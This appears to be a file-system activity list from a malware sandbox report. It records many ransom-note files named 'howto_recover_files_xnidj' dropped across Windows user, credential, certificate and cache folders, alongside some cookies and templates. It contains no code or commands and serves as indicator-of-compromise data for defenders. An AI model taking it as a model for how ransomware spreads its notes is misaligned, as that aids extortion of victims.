%Documents and Settings%\Default User\Templates\excel.xls (427 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (1052 bytes)
%Documents and Settings%\%current user%\Templates\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Accessories\Accessibility\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\63\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temp\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\jre1.6.0_18\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Start Menu\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\Internet Explorer\brndlog.txt (1116 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Local Settings\History\History.IE5\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Updater6\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\60\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\23\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\tmp\si\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Windows Media\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-19\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temp\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\VMware\VMware Tools\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Start Menu\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Music\Beethoven's Symphony No. 9 (Scherzo).wma (6148 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\Certificates\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Games\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\CTLs\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\UserData\4XCFALMJ\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Entertainment\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\56\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Music\New Stories (Highway Blues).wma (7698 bytes)
%Documents and Settings%\%current user%\Cookies\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\CRLs\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Favorites\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Music\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\Certificates\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\My Documents\My Music\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\41\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Accessories\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\17\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (1216 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\38\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\History\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\20\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\28\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Playlists\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Wireshark\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\35\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\muffin\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\17\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\VMware\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Color\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (11392 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\brndlog.txt (436 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\2\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Templates\winword2.doc (419 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\9\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\CRLs\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@money.ca.msn[1].txt (1020 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\9\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Favorites\Links\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\57\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\58\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\44\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\CTLs\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.atdmt[2].txt (1440 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\29\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Identities\{37E80C13-CB45-4DCE-A438-545B791476AC}\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Startup\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\7\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\13\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\1\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.html (6 bytes)
C:\totalcmd\LANGUAGE\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\60\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\JavaScripts\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\History\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\CTLs\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ActivePerl 5.16.2 Build 1602\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\31\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\59\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (1020 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Desktop\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Color\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\Sunset.jpg (1157 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\49\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Templates\excel.xls (427 bytes)
%Documents and Settings%\Default User\My Documents\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Total Commander\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\60\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\CTLs\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Start Menu\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Local Settings\History\History.IE5\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\24\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\20\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\37\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\26\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Playlists\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Local Settings\History\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\63\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\25\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Templates\quattro.wb2 (430 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.bing[1].txt (1280 bytes)
%Documents and Settings%\%current user%\My Documents\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\51\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\13\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\12\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\36\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\16\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Protect\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\5\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\43\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\jre1.6.0_18\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\46\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\22\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Documents\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\24\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\AssetCache\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Local Settings\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\howto_recover_files_xnidj.txt (2 bytes)
C:\totalcmd\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Templates\excel4.xls (419 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\13\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\58\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.ca.msn[1].txt (988 bytes)
%Documents and Settings%\%current user%\My Documents\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Cookies\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\26\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Documents\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Accessories\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\NetHood\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\18\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\11\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Windows\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Accessories\Entertainment\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\VMware\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\PrintHood\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\15\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Startup\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\21\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\54\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Templates\wordpfct.wpd (892 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\47\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Accessibility\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\14\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\s.ytimg.com\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\31\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\30\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\History\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (1318 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Entertainment\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\39\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Templates\quattro.wb2 (430 bytes)
%Documents and Settings%\All Users\Documents\My Videos\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\11\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\28\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Templates\winword2.doc (419 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\32\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\s.ytimg.com\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\18\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\History\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hit.gemius[2].txt (1116 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Accessories\Accessibility\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\Certificates\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\Certificates\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\VMware\VMware Tools\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\6\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\34\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\21\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\GHISLER\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Favorites\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\27\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (1116 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\36\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\My Documents\My Music\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\21\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\53\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Templates\wordpfct.wpd (892 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\30\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\46\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\52\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\AssetCache\E7VJ4HGS\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (1052 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\30\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (1600 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\34\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\43\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\31\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\NetHood\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\muffin\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\My Documents\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.txt (2 bytes)
